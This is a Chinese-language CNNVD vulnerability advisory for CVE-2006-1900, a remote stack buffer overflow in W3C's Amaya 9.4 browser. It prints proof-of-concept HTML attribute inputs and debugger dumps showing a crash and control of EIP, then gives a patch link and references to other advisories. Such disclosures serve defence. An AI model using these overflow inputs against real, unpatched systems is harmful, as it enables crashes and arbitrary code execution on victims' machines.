| CNNVD-ID编号 | CNNVD-200604-389 |
| CVE编号 | CVE-2006-1900 |
| 发布时间 | 2006-04-20 |
| 更新时间 | 2006-04-24 |
| 漏洞类型 | 缓冲区溢出 |
| 漏洞来源 | Thomas Waldegger bugtraq@morph3us.org |
| 危险等级 | 高危 |
| 威胁类型 | 远程 |
| 厂 商 | w3c |
W3C的Amaya是一个所见即所得的Web浏览器和认证程序。
Amaya实现上存在多个漏洞,远程攻击者可能导致程序崩溃或执行任意指令。
以下代码段(可能还有其他类似的代码段)可以强迫Amaya崩溃:
> <colgroup compact=\"Ax200\">
> [...]
> <textarea rows=\"Ax200\">
> eax=000000f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420
> edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
>
> 004edd61 03f3 add esi,ebx
> 004edd63 a4 movsb
> 004edd64 8b4500 mov eax,[ebp]
> 004edd67 8b8c241c010000 mov ecx,[esp+0x11c]
> 004edd6e 8b942418010000 mov edx,[esp+0x118]
> 004edd75 50 push eax
> 004edd76 51 push ecx
> 004edd77 53 push ebx
> 004edd78 52 push edx
> 004edd79 e8a23c0200 call amaya+0x111a20 (00511a20)
> 004edd7e 53 push ebx
> 004edd7f e83cf90000 call amaya+0xfd6c0 (004fd6c0)
> 004edd84 83c428 add esp,0x28
> 004edd87 8bbc24fc000000 mov edi,[esp+0xfc]
> 004edd8e 8b942400010000 mov edx,[esp+0x100]
> FAULT ->004edd95 8b4240 mov eax,[edx+0x40]
> ds:0023:41414181=????????
> 004edd98 83f844 cmp eax,0x44
> 004edd9b 0f8527030000 jne amaya+0xee0c8 (004ee0c8)
> 004edda1 837c242457 cmp dword ptr [esp+0x24],0x57
> 004edda6 0f8465060000 je amaya+0xee411 (004ee411)
> 004eddac 8b4500 mov eax,[ebp]
> 004eddaf 8b8c2408010000 mov ecx,[esp+0x108]
> 004eddb6 6aff push 0xff
> 004eddb8 50 push eax
> 004eddb9 51 push ecx
> 004eddba 57 push edi
> 004eddbb e8d33af1ff call amaya+0x1893 (00401893)
> 004eddc0 83c410 add esp,0x10
> 004eddc3 5f pop edi
> 004eddc4 5e pop esi
> 004eddc5 5d pop ebp
这样就可以控制EIP:
> <textarea rows=
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB>
> eax=00000001 ebx=00000000 ecx=77c10e72 edx=007bd472
> esi=0000003e edi=00000000 eip=42424242 esp=0012ea38 ebp=00000000
> Function: <nosymbols>
> No prior disassembly possible
> 42424242 ?? ???
> 42424244 ?? ???
> 42424246 ?? ???
> 42424248 ?? ???
> 4242424a ?? ???
> 4242424c ?? ???
此外,以下代码段也可以导致Amaya 9.4崩溃:
> <legend color=\"Ax200\">
> eax=41414141 ebx=02ae7200 ecx=41414141 edx=41414141 esi=00000000
> edi=00000000 eip=00516135 esp=0012e1cc ebp=007dd6e8 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
>
> 00516114 56 push esi
> 00516115 57 push edi
> 00516116 33ff xor edi,edi> 00516118 33f6 xor esi,esi
> 0051611a 3bcf cmp ecx,edi
> 0051611c 893d943df101 mov [amaya+0x1b13d94
> (01f13d94)],edi
> 00516122 7511 jnz amaya+0x116135 (00516135)
> 00516124 6a0a push 0xa
> 00516126 e825d80500 call amaya+0x173950 (00573950)
> 0051612b 83c404 add esp,0x4
> 0051612e 8bd7 mov edx,edi
> 00516130 8bc6 mov eax,esi
> 00516132 5f pop edi
> 00516133 5e pop esi
> 00516134 c3 ret
> FAULT ->00516135 8b4134 mov eax,[ecx+0x34]
> ds:0023:41414175=????????
> 00516138 3bc7 cmp eax,edi
> 0051613a 74f2 jz amaya+0x11612e (0051612e)
>
目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
http://www.w3.org/Amaya/User/BinDist.html
来源: XF
名称: amaya-various-attribute-bo(25791)
来源: OSVDB
名称: 24624
来源: OSVDB
名称: 24623
来源: VUPEN
名称: ADV-2006-1351
来源: SECUNIA
名称: 19670
来源: BID
名称: 17507
来源: MISC
来源: MISC
来源: BUGTRAQ
名称: 20060412 [BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4 #2
链接:http://www.securityfocus.com/archive/1/archive/1/430879/100/0/threaded